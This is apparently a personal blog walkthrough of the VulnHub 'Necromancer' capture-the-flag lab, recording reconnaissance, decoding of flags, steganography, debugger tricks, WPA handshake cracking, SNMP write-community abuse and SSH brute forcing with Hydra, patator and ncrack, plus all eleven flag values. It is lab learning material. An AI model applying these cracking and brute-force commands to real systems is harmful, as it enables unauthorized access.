CTF – Hacking Necromancer

Capture The Flag – Necromancer. Practicing my penetration testing skills to hack a target machine.  Here’s my test environment in my own private virtual network.

I setup my Kali Linux in host virtual network and my target machine (Necromancer) which I downloaded a OVA image from VulnHub website.

When I started my Kali Linux virtual machine, I have an assigned IP Address 192.168.231.129. This most likely a different IP address when you setup your own private network. And my target machine Necromancer IP address is 192.168.231.128. I saw this when I started the Necromancer virtual machine. This save me some time to scan all /24 within my network.

Anyway, if you still want to scan your network you can use “netdiscover” tool. If you’re not sure what options to use simply run “netdiscover –help”. Okay, got it? Now run # netdiscover -r 192.168.231.0/24 [Enter] to scan your private network. Here’s the result of my network. I run “ifconfig” in my Kali to know the assigned IP address, then the other IP most likely for my target network.

192.168.231.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.231.128 00:0c:29:a5:8c:67 1 60 VMware, Inc.
192.168.231.129 00:50:56:f0:0a:96 1 60 VMware, Inc.

With this information I can simply run nmap to my target IP address.

que-com-ctp-necromancer

Note: IP Address renewal in 900 seconds.

Now my private network, Kali and target machine are ready. Let’s begin hacking my target machine.

From Kali Linux virtual machine run # nmap 192.168.231.29 to see what I can discover.

que-com-ctp-necromancer-nmap

I found port 80 open and 1 host up. That’s a good start. Let’s run # nmap -sU -n -r -T4 192.168.231.128

que-com-ctp-necromancer-nmap-doom

Now it’s getting interesting. I found UDP port 666 a service for doom.

Let’s fire up netcat using the newly discovered UDP port 666 # nc 192.168.231.128 666 [Enter].

que-com-ctp-necromancer-netcat

Hmm. Nothing happen. I wonder what’s going on in the background. One way to find out, let’s run our network snipping tool wireshark. I filter the result using my target machine IP Address 192.168.231.128 and found out it is trying to connect to the destination port 4444.

que-com-ctp-necromancer-wireshark

I open another terminal window, and setup to listen using port 4444 # nc -lvp 4444 [Enter]. And re-run # nc -u 192.168.231.128 666 [Enter], then wait to see the output in listening terminal window.

This is the result.

que-com-ctp-necromancer-netcat-captureddata

My first guess, it is a base64 code. I copied the code to my dumptext.txt file. And run #base64 -d -i dumptext.txt [Enter]

Woohh. I got the first flag.

que-com-ctp-necromancer-flag1

I copied  flag1{e6078b9b1aac915d11b9fd59791030bf}  to my flags.txt file for recording purpose, just like a trophy 🙂

Looks like flag1{e6078b9b1aac915d11b9fd59791030bf}  is a MD5 hash. Searching google for “MD5 decrypt”. Visit a website https://hashkiller.co.uk/md5-decrypter.aspx to decrypt it.

que-com-ctp-necromancer-flag1-md5decrypted

I’ve got “opensesame”. Now let’s run this command. # echo opensesame | nc -u 192.168.231.128 666

After running the command, it reveal our flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}.

que-com-ctp-necromancer-flag2

I got another port 80, and notice port 666 is closed. I verified it by running # nmap -sU -n -r -T4 192.168.231.128. Yes, it is confirmed port 666 is not there anymore.

que-com-ctp-necromancer-flag2-666isclosed

Open a Firefox, and enter URL 192.168.231.128, no need to enter port 80. I got the website with a bird image.

que-com-ctp-necromancer-flag2-website-image

Reading the text, doesn’t give any hint for my next move except with the obvious bird image. Let me download this image and see what I can dig up. I saved it as “pileoffeathers.jpg” to my necromancer folder.

Let’s examine the “pileoffeathers.jpg” file. Run #file pileoffeathers.jpg to see what it is, then #exif pileoffeathers.jpg. We have no value of color space, that’s interesting.

que-com-ctp-necromancer-flag2-pileoffeathers

Next thing to do is run hexeditor to see what’s in the jpg file # hexeditor pileoffeathers.jpg

que-com-ctp-necromancer-flag2-hexeditor

Look what I found? A file name feathers.txt within the pileoffeathers.jpg hidden, not anymore 🙂

que-com-ctp-necromancer-binwalk

Running #binwalk pileoffeathers.jpg confirmed there is zip archive data.

Let’s run # unzip pileoffeathers.jpg maybe it will produce this feathers.txt file.

que-com-ctp-necromancer-flag2-unzip

Viola feathers.txt is available for me to read.

root@kali:~/necromancer# cat feathers.txt
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==
root@kali:~/necromancer#

Hmm. Another base64 coded file. No problem, let’s run it.

root@kali:~/necromancer# base64 -d -i feathers.txt
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm

The feathers.txt file revealed flag3{9ad3f62db7b91c28b68137000394639f}. We are getting lucky here and another sub-folder /amagicbridgeappearsatthechasm

Let’s visit the website http://192.168.231.128/amagicbridgeappearsatthechasm/ shows more text and an image.

que-com-ctp-necromancer-flag3

“There must be a magical item that could protect you from the necromancer’s spell.” Is this a hint? I don’t know.

Tried the same approach from the pileoffeathers.jpg file.

root@kali:~/necromancer# file magicbook.jpg
magicbook.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1×1, segment length 16, baseline, precision 8, 600×450, frames 3
root@kali:~/necromancer# exif magicbook.jpg
Corrupt data
The data provided does not follow the specification.
ExifLoader: The data supplied does not seem to contain EXIF data.
root@kali:~/necromancer# unzip magicbook.jpg
Archive: magicbook.jpg
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of magicbook.jpg or
magicbook.jpg.zip, and cannot find magicbook.jpg.ZIP, period.

No luck! Not looking good.

Going back to the last webpage http://192.168.231.128/amagicbridgeappearsatthechasm/  maybe  running a dirbuster tool will assist me uncovering the hidden magic 🙂

root@kali:~/necromancer# dirb http://192.168.231.128/amagicbridgeappearsatthechasm/ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Tue Nov 29 14:50:41 2016
URL_BASE: http://192.168.231.128/amagicbridgeappearsatthechasm/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

—————–

*** Generating Wordlist… (this is my queue to take a quick break)

—- Scanning URL: http://192.168.231.128/amagicbridgeappearsatthechasm/ —-
+ http://192.168.231.128/amagicbridgeappearsatthechasm/talisman (CODE:200|SIZE:9676)

—————–
END_TIME: Tue Nov 29 15:02:28 2016
DOWNLOADED: 81628 – FOUND: 1

After few minutes, I got lucky the result came up and found talisman

Go to Firefox and visit the new URL http://192.168.231.128/amagicbridgeappearsatthechasm/talisman we just found, then prompted to save it. Saved the file as talisman

Note: In Firefox, the download file will be save in Download folder.

I have to copy the downloaded talisman file to my working folder.

root@kali:~/necromancer# cp ~/Downloads/talisman ./

root@kali:~/necromancer# ls
dumptext.txt feathers.txt magicbook.jpg talisman
feathers.cp.txt flags.txt pileoffeathers.jpg

Let’s check the talisman file.

root@kali:~/necromancer# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

It’s a bummer, the talisman file is 32-bit executable. I’m running Kali in 64bit :(. It this the end for me? Nope…

root@kali:~/necromancer# binwalk talisman

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)

Nothing to find here …

root@kali:~/necromancer# ls -al
total 232
drwxr-xr-x 2 root root 4096 Nov 29 15:19 .
drwxr-xr-x 17 root root 4096 Nov 29 12:57 ..
-rw-r–r– 1 root root 1423 Nov 29 11:47 dumptext.txt
-rw-r–r– 1 root root 125 Nov 29 11:47 feathers.cp.txt
-rw-r–r– 1 root root 125 May 9 2016 feathers.txt
-rw-r–r– 1 root root 183 Nov 29 11:05 flags.txt
-rw-r–r– 1 root root 158080 Nov 29 14:41 magicbook.jpg
-rw-r–r– 1 root root 37289 Nov 29 11:01 pileoffeathers.jpg
-rw-r–r– 1 root root 9676 Nov 29 15:19 talisman
root@kali:~/necromancer# chmod +x talisman
root@kali:~/necromancer# ./talisman
bash: ./talisman: No such file or directory        <– Duh!
root@kali:~/necromancer#

First, I need to install the 32bit architecture of Kali so I can execute this file. Time to google on how to install the 32 bit package for Kali so I can execute talisman file.

Took forever … to figure this out. I setup my Kali virtual machine in a host private network. I have no access to the internet for this isolated network for hacking my test environment. So I have to reboot my Kali virtual machine and configure to NAT so I can connect to the Internet and run the following command  for the architecture i386.

dpkg –add-architecture i386
apt-get update
apt-get install ia32-libs

NOTE: I should run another Kali virtual machine in 32bit so I don’t have to deal with this add-infrastructure i386 update.

Break time, time to get a sandwich.

Not helping at this time. I run another Kali virtual machine in 32bit so I can execute the”talisman” file.

root@kali:~/KING.NET/necromancer# chmod +x talisman
root@kali:~/KING.NET/necromancer# ls -al
total 72
drwxr-xr-x 2 root root 4096 Nov 29 22:30 .
drwxr-xr-x 3 root root 4096 Nov 29 22:09 ..
-rw-r–r– 1 root root 1423 Nov 29 22:10 dumptext.txt
-rw-r–r– 1 root root 125 May 9 2016 feathers.txt
-rw-r–r– 1 root root 202 Nov 29 22:16 flags.txt
-rw-r–r– 1 root root 37289 Nov 29 22:15 pileoffeathers.jpg
-rwxr-xr-x 1 root root 9676 Nov 29 22:30 talisman

Then execute ./talisman file to see what will happen next.

root@kali:~/KING.NET/necromancer# ./talisman
You have found a talisman.

The talisman is cold to the touch, and has no words or symbols on it’s surface.

Do you want to wear the talisman? y

Nothing happens.

Let me run GNU Debugger.

root@kali:~/necromancer# gdb talisman
GNU gdb (Debian 7.11.1-2+b1) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type “show copying”
and “show warranty” for details.
This GDB was configured as “x86_64-linux-gnu”.
Type “show configuration” for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type “help”.
Type “apropos word” to search for commands related to “word”…
Reading symbols from talisman…(no debugging symbols found)…done.
(gdb) info functions [Enter]
All defined functions:

Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini

(gdb) break wearTalisman
Breakpoint 1 at 0x804852d
(gdb) run
Starting program: /root/KING.NET/necromancer/talisman

Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[Inferior 1 (process 2728) exited normally]
(gdb)

I got flag4 and new hint udp port 31337, that’s a long task to finish. Moving on …

I used again the MD5 Decrypter website to decode flag4 code and came up this value “blackmagic

root@kali:~/KING.NET/necromancer# echo blackmagic | nc -u 192.168.159.128 31337

As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until…. silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.

/thenecromancerwillabsorbyoursoul

flag5{0766c36577af58e15545f099a3b15e60}

Looking good, I got flag5 and another hint.

Using the new hint, let’s go visit this page http://192.168.159.128/thenecromancerwillabsorbyoursoul/

This page gave me the flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
code. Easy. At the end of the page, another hint maybe “Looking closer at the skull, you can see u161 engraved into the forehead.“. This is UDP port 161 for SNMP. I don’t know yet, if this will be useful later on.

I downloaded the link filename “necromancer” and also the image “necromancer.jpg” file.

Using binwalk to investigate the “necromancer” file.

root@kali:~/KING.NET/necromancer# binwalk necromancer

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 bzip2 compressed data, block size = 900k

The “necromancer” is a bzip2 file. Let’s unzip this file. Again, if you need help simply run “bzip2 –help” and it will provide you all available options. I will use -d option to decompress the file.

root@kali:~/KING.NET/necromancer# bzip2 -d necromancer
bzip2: Can’t guess original name for necromancer — using necromancer.out

-rw-r–r– 1 root root 81920 Nov 29 23:42 necromancer.out

Let’s find out about the new file “necromancer.out”. Run binwalk against this file to know more about it.

root@kali:~/KING.NET/necromancer# binwalk necromancer.out

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 POSIX tar archive (GNU), owner user name: “cer.cap”

So, the “necromancer.out” is a tar archive. Let’s decompress this file.

root@kali:~/KING.NET/necromancer# tar -xf necromancer.out [Enter]. It produce another file “necromancer.cap”. I can read .cap extension using wireshark tool to see what’s in it.

-rw-r–r– 1 root root 80242 May 10 2016 necromancer.cap

When I open “necromancer.cap” using wireshark. I know right away, it is a traffic for wireless traffic. See captured image below.

que-com-ctp-necromancer-pentest-wireshark

I can crack this file using Aircrack-ng wireless cracking tool and the rockyou.txt to discover the secret key. First, I need to unzip the rockyou.txt.gz so I can use it.

root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -al rockyou.txt
-rw-r–r– 1 root root 139921507 Mar 3 2013 rockyou.txt

And the file is ready to use. Let’s try aircrack-ng tool to get more information about the necromancer.cap file.

root@kali:~/KING.NET/necromancer# aircrack-ng necromancer.cap -w /usr/share/wordlists/rockyou.txt
que-com-ctp-necromancer-aircrack-ng

The key is “death2all” is revealed.

I can also use another tool “pyrit” to produce the same results. It’s nice to know other alternative cracking tools.

root@kali:~/KING.NET/necromancer# pyrit -r necromancer.cap -i /usr/share/wordlists/rockyou.txt attack_passthrough
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file ‘necromancer.cap’ (1/1)…
Parsed 6 packets (6 802.11-packets), got 1 AP(s)

Picked AccessPoint c4:12:f5:0d:5e:95 (‘community‘) automatically.
Tried 40002 PMKs so far; 944 PMKs per second.

The password is ‘death2all‘.

Between the aircrack-ng and pyrit cracking tools, I prefer to use aircrack-ng since I used this tool in the past, during my wardriving competition at BlackHat.

Ok, what to do with newly discovered password? Remember, we have another hint using port 161 for SNMP. I think snmpwalk will help un-cover more data.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1 192.168.159.128
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
iso.3.6.1.2.1.1.4.0 = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”
iso.3.6.1.2.1.1.6.0 = STRING: “Locked – death2allrw!
End of MIB

I don’t remember on how to change the SNMP string, so google search to the rescue. I found interesting video tutorial courtesy by Keks-IT.

root@kali:~/KING.NET/necromancer# snmpset -c death2allrw -v1 192.168.159.128 iso.3.6.1.2.1.1.6.0 s Unlocked
iso.3.6.1.2.1.1.6.0 = STRING: “Unlocked”

Then, re-run root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1 192.168.159.128

Viola! Flag7 is revealed with our new TCP port 22 for SSH.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1 192.168.159.128
iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
iso.3.6.1.2.1.1.4.0 = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”
iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”
iso.3.6.1.2.1.1.6.0 = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22″
End of MIB

To access SSH server, I need a username and password to enter. Maybe my flag7 is a username. Let’s use hashkiller website to decrypte flag7 value, and the result is”demonslayer“.

que-com-ctp-necromancer-pentest-hashkiller

I’m assuming this my ssh username. I tried to login using demonslayer as username and password, but no luck.

Let’s start password cracking. Tools to use can be John, Hydra, Potator ncrack or Medusa. Let’s use Hydra for example.

que-com-ctp-necromancer-pentest-hydra-passwordcracking

Password cracked in under 1 minute.

Alternative password cracking tools.

root@kali:~/KING.NET/necromancer# patator ssh_login host=10.0.0.100 port=22 user=demonslayer password=FILE0 0=rockyou.txt -x ignore:mesg=’Authentication failed.’

root@kali:~/KING.NET/necromancer# ncrack -p 22 –user demonslayer -v -P /usr/share/wordlists/rockyou.txt -f 192.168.159.128

All produce the same results.

Now, let’s use our discovered username “demonslayer” and password “12345678” to connect via SSH (port 22).

root@kali:~/KING.NET/necromancer# ssh demonslayer@192.168.159.128
The authenticity of host ‘192.168.159.128 (192.168.159.128)’ can’t be established.
ECDSA key fingerprint is SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.159.128’ (ECDSA) to the list of known hosts.
demonslayer@192.168.159.128’s password:

que-com-ctp-necromancer-pentest-necromancer

List the directory and we got flag8.txt

$ ls
flag8.txt
$ cat flag8.txt
You enter the Necromancer’s Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

“You are a fool to follow me here! Do you not know who I am!”

The necromancer turns to face you. Dark words fill the air!

“You are damned already my friend. Now prepare for your own death!”

Defend yourself! Counter attack the Necromancer’s spells at u777!

I don’t see my flag8 in this text, though a hint of UDP port 777

$ nc -u localhost 777

** You only have 3 hitpoints left! **

Google search is your best source to get the answer. 

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Where do the Black Robes practice magic of the Greater Path? Kelewan
flag8{55a6af2ca3fee9f2fef81d20743bda2c}

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who did Johann Faust VIII make a deal with? Mephistopheles

flag9{713587e17e796209d1df4c9c2c2d2966}

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who is tricked into passing the Ninth Gate? Hedge

flag10{8dc6486d2c63cafcdc6efbba2be98ee4}

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

^C
$ ls -al
total 44
drwxr-xr-x 3 demonslayer demonslayer 512 Nov 30 12:01 .
drwxr-xr-x 3 root wheel 512 May 11 2016 ..
-rw-r–r– 1 demonslayer demonslayer 87 May 11 2016 .Xdefaults
-rw-r–r– 1 demonslayer demonslayer 773 May 11 2016 .cshrc
-rw-r–r– 1 demonslayer demonslayer 103 May 11 2016 .cvsrc
-rw-r–r– 1 demonslayer demonslayer 359 May 11 2016 .login
-rw-r–r– 1 demonslayer demonslayer 175 May 11 2016 .mailrc
-rw-r–r– 1 demonslayer demonslayer 218 May 11 2016 .profile
-rw-r–r– 1 demonslayer demonslayer 196 Nov 30 12:00 .smallvile
drwx—— 2 demonslayer demonslayer 512 May 11 2016 .ssh
-rw-r–r– 1 demonslayer demonslayer 706 May 11 2016 flag8.txt
$

$ cat .smallvile
You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!

$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
env_keep+=”FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK”

User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt

$ sudo /bin/cat /root/flag11.txt

que-com-ctp-necromancer-pentest-necromancer-done

All the flags.

root@kali:~/KING.NET/necromancer# cat flags.txt
flag1{e6078b9b1aac915d11b9fflag1{e6078b9b1aac915d11b9fd59791030bf}
flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm
flag4{ea50536158db50247e110a6c89fcf3d3}
flag5{0766c36577af58e15545f099a3b15e60}
flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
flag7{9e5494108d10bbd5f9e7ae52239546c4}
flag8{55a6af2ca3fee9f2fef81d20743bda2c}
flag9{713587e17e796209d1df4c9c2c2d2966}
flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
flag11{42c35828545b926e79a36493938ab1b1}

I’m still honing my penetration testing skills, will continue to learn from other smart hackers out there. I’m catching up …

Cheers.

Useful links:

 

EM @QUE.COM

Founder, QUE.COM Game Studios. | Founder, Yehey.com a Shout for Joy! |
MAJ.COM Management of Assets and Joint Venture |

More at KING.NET Ideas to Life | Network of Innovation |

Send your Tip to my Bitcoin/Ethereum or other crypto currency.

2 thoughts on “CTF – Hacking Necromancer

  • April 24, 2017 at 3:14 pm
    Permalink

    Hi!

    Great writeup! Just so you know: there is simpler(or at least way faster) way to deal with 32-bit app;ication in 64-bit Kali.

    All you need to do is install package libc6-i386 and you should be good to go 🙂

    Reply
  • April 24, 2017 at 3:48 pm
    Permalink

    Thank you for your suggestion. For some reason, I didn’t have the time to do it during my session. I will try it again next time.

    Reply

Leave a Reply